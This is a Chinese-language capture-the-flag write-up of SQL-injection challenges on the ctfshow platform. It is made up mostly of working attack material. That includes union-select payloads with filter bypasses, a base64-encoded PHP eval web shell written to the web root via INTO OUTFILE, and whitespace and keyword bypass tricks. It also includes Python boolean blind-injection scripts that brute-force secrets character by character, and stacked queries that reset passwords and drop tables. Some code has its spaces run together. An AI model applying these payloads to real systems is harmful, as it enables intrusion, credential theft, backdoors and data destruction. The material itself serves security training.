+----+----------+--------------+ | id | username | password | +----+----------+--------------+ |4| flag | flag{wh)am!} | +----+----------+--------------+
payload (因为 username 里面含有 flag 字样 , 就不要这个位置回显了 )
1
0' union select 'USERNAME',replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,"1","!"),"2","@"),"3","#"),"4","$"),"5","%"),"6","^"),"7","&"),"8","*"),"9","("),"0",")") from ctfshow_user4 where username = 'flag
payload 很长 , BP 发包(提醒URL 编码)
1 2 3
ctfshow{db)e(^a^-fed^-$^(e-ab!a-*f#@ba&!%e^e}
ctfshow{db0e96a6-fed6-469e-ab1a-8f32ba715e6e}
web 175 木马写入
1
preg_match('/[\x00-\x7f]/i', json_encode($ret))
极为严格的输出过滤
回显信道很难写了, 试试能不能文件写入
1
select username,password from ctfshow_user5 where username !='flag' and id = '0' union select 1,from_base64("PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+") into outfile '/var/www/html/choco.php' limit 1;
payload
1
0' union select 1,from_base64("PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+") into outfile '/var/www/html/choco.php
AntSword 连接 > API Config 文件找到数据库密码 AntSword 连接 > 数据库 找到 flag
过滤注入
web 176 开始过滤
啥也没过 , 新手村
1
0' or username='flag
web 177 绕过空格
黑盒 经过尝试, 过滤了空格
1
%20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/
使用 /**/ 和 反引号 绕过
1
select id,username,password from ctfshow_user where username !='flag'and id ='0'unionselect1,2,3;%23 limit 1;
1
select id,username,password from ctfshow_user where username !='flag'and id ='0'union/**/select'1',(select`password`from`ctfshow_user`where`username`='flag'),'3';
import requests import time url = "http://89bf82b1-24b0-4580-866a-53f84877892f.challenge.ctf.show/select-waf.php" flagstr = "}0123456789-abcdefghijklmnopqrstuvwxyz{" flag = "" for i inrange(0,40): for x in flagstr: data={ "tableName": "`ctfshow_user`where`pass`regexp(\"ctfshow{}\")".format(flag+x) } response = requests.post(url,data=data) time.sleep(0.25) if response.text.find("user_count = 1;")>0: print("{} is good".format(x)) flag += x print("ctfshow"+flag) break else: print("{}".format(x)) continue print(flag)
# 字符转十六进制 defstr2hex(str): input="" for n instr: input += hex(ord(n)) returninput.replace("0x","")
flag = "" for i inrange(0,40): for x in flagstr: data={ "tableName" : "ctfshow_user group by pass having pass regexp(0x63746673686f77{})".format(str2hex(flag+x)) } response = requests.post(url,data=data) time.sleep(0.25) if response.text.find("user_count = 1;")>0: print("{} is good".format(x)) flag += x print("ctfshow"+flag) break else: print("{}".format(x)) continue print(flag)
def str2hex(str): input="" for n in str: input += hex(ord(n)) return input.replace("0x","")
def formatstring(str): each="" for n in str: if n=="0": each += ",(false)" continue if n=="1": each += ",(true)" continue if n=="2": each += ",(true+true)" continue if n=="3": each += ",(true+true+true)" continue if n=="4": each += ",(true+true+true+true)" continue if n=="5": each += ",(true,true,true,true,true)" continue if n=="6": each += ",(true+true+true+true+true+true)" continue if n=="7": each += ",(true+true+true+true+true+true+true)" continue if n=="8": each += ",(true+true+true+true+true+true+true+true)" continue if n=="9": each += ",(true+true+true+true+true+true+true+true+true+true)" continue else: each += ",\""+n+"\"" return each
defformatstring(str): temp="concat(" for i instr: temp+=char2boolean(i) return temp[:-1]+")"
defchar2boolean(ch): num = ord(ch) temp = "char(" for i inrange(num): temp+="true+" return temp[:-1]+"),"
flag = "ctfshow{" for i inrange(0,40): for x in flagstr: data={ "tableName" : "ctfshow_user group by pass having pass regexp({})".format(formatstring(flag+x)) } #print(data) response = requests.post(url,data=data) time.sleep(0.5) if response.text.find("user_count = 1;")>0: print("{} is good".format(x)) flag += x print(flag+"...") break else: print("{}".format(x)) continue print(flag)
web 186 布尔盲注
新增的过滤< > 不影响185的脚本
再战一次吧
web 187 MD5函数注入
1 2 3 4 5 6 7 8 9 10 11
$sql = "select count(*) from ctfshow_user where username = '$username' and password= '$password'";
flag = "" for i inrange(257,257+60): for x in flagstr: data={ "username":"if(substr(load_file('/var/www/html/api/index.php'),{},1)=('{}'),1,0)".format(i,x), "password":"0" } print(data) response = requests.post(url,data=data) time.sleep(0.2) if response.text.find("8d25")>0: print("{} is good".format(x)) flag += x print("ctfshow"+flag) break else: print("{}".format(x)) continue print(flag)
QWQ不要直接复制URL 这里调用的API
布尔盲注
web 190 布尔盲注 ASCII
1
$sql = "select pass from ctfshow_user where username = '{$username}'";
username被单引号包裹
1 2 3
admin' and 2>1# >> POST /api/ {"code":0,"msg":"\u5bc6\u7801\u9519\u8bef","count":0,"data":[]} >> 密码错误
url = "http://d42e0cf1-5325-4dd7-8c49-fb8ce6a8aee6.challenge.ctf.show/api/" flag = "" for i inrange(1,60): max = 127 min = 32 while1: mid = (max+min)>>1 ifmin == mid: flag += chr(mid) print(flag) break #payload = "admin'and (ascii(substr((select database()),{},1))<{})#".format(i,mid) #ctfshow_web #payload = "admin'and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{})#".format(i,mid) #ctfshow_fl0g #payload = "admin'and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{},1))<{})#".format(i,mid) #id,f1ag payload = "admin'and (ascii(substr((select f1ag from ctfshow_fl0g),{},1))<{})#".format(i,mid)
data = { "username":payload, "password":0, } res = requests.post(url = url,data =data) time.sleep(0.3) if res.text.find("8bef")>0: max = mid else: min = mid
web 191 布尔盲注 ORD
preg_match('/file|into|ascii/i', $username)
ASCII不让用
换成 ord( )函数
web 192 substr =
禁用了 ASCII ORD HEX
没有二分法可用( 转换函数BAN完了基本上 )
采用匹配
1 2 3
admin'and (ord(substr((select f1ag from ctfshow_fl0g),{},1))<{})# || admin'and ((substr((select f1ag from ctfshow_fl0g),1)='{}'))#
web 193 left >
substr 被过滤
使用LEFT函数判断大小 (a<b<c)
1 2 3 4 5 6
select*fromuserwhere username ='admin1'and (left((select column_name from table_name),1)<'d'); +----+----------+----------+ | id | username | password | +----+----------+----------+ |1| admin1 |12| +----+----------+----------+
如果flag取第一个字母 是比d小的 (a b c) 那么查询admin 否则Empty set
1
admin'and (left((select database()),1)='c')#
好难写 用189(虽然有好多debug代码 但是也方便改了嘻嘻)的改
数据库名
admin'and (left((select tablename() from ctfshow_web),{})='{}')#
查询数据库名: ctfshow_web
数据表名
1 2 3 4 5 6
select * from user where username = 'admin1'and (left((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)='f'); +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | admin1 | 12 | +----+----------+----------+
admin'and (left((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'),{})='{}')#
查询数据表名: ctfshow_flxg
列名
admin'and (left((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'),{})='{}')#
列名 id,f1ag
注意 列名之间 mysql是用逗号隔开 , flagstr里面记得灵活调整
最后
payloadadmin' and (left((select f1ag from ctfshow_flxg),{})='{}')#
flag = "" for i inrange(1,60): for x in flagstr: data={ "username":"admin' and (left((select f1ag from ctfshow_flxg),{})='{}')#".format(i,flag+x), "password":"0" } #print(data) response = requests.post(url,data=data) time.sleep(0.002) if response.text.find("8bef")>0: print("{} is good".format(x)) flag += x print(flag) break else: print("{}".format(x)) continue print(flag)
web 194 LPAD
1 2 3
select pass from ctfshow_user where username = '{$username}'
flag = "" for i inrange(1,60): for x in flagstr: data={ "username":"admin' and (lpad((select f1ag from ctfshow_flxg),{})='{}')#".format(i,flag+x), "password":"0" } #print(data) response = requests.post(url,data=data) time.sleep(0.002) if response.text.find("8bef")>0: print("{} is good".format(x)) flag += x print(flag) break else: print("{}".format(x)) continue print(flag)
if($row[0]==$password){ $ret['msg']="登陆成功 flag is $flag"; }
空格 单双引号 过滤
但是查询语句中没有单双引号保护
可能是堆叠注入
(多条sql语句同时执行)
select | union 被ban
这里提供一个update思路 把密码都重置为1
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
mysql>select*from hexo where uname ='a';update`hexo`set`position`='Poz'; +----+-------+----------+ | id | uname | position | +----+-------+----------+ |1| a | A | +----+-------+----------+ 1rowinset (0.02 sec)
username=0&password=1 >>{"code":0,"msg":"\u767b\u9646\u6210\u529f flag is ctfshow{73cf58de-eb2b-4c17-83a6-4201abbe626c}","count":0,"data":[]}
插眼 后面有update模块 应该就是通过这个
web 196堆叠
0;select(1) password=1
或
利用泄露过的passwd username=0&passwordAUTO
web 197 重置UP
默认账密username=0&passwordAUTO能出
但是select不让增加了 196的办法不行
这里有个暴力做法, 直接把表给他换成自己的
1 2 3 4 5 6 7
select position from hexo where uname =0; DROP TABLE IF EXISTS hexo; CREATE TABLE hexo ( `username` VARCHAR(20), `pass` VARCHAR(20) ); INSERT INTO hexo (`username`, `pass`) VALUES (1, 2);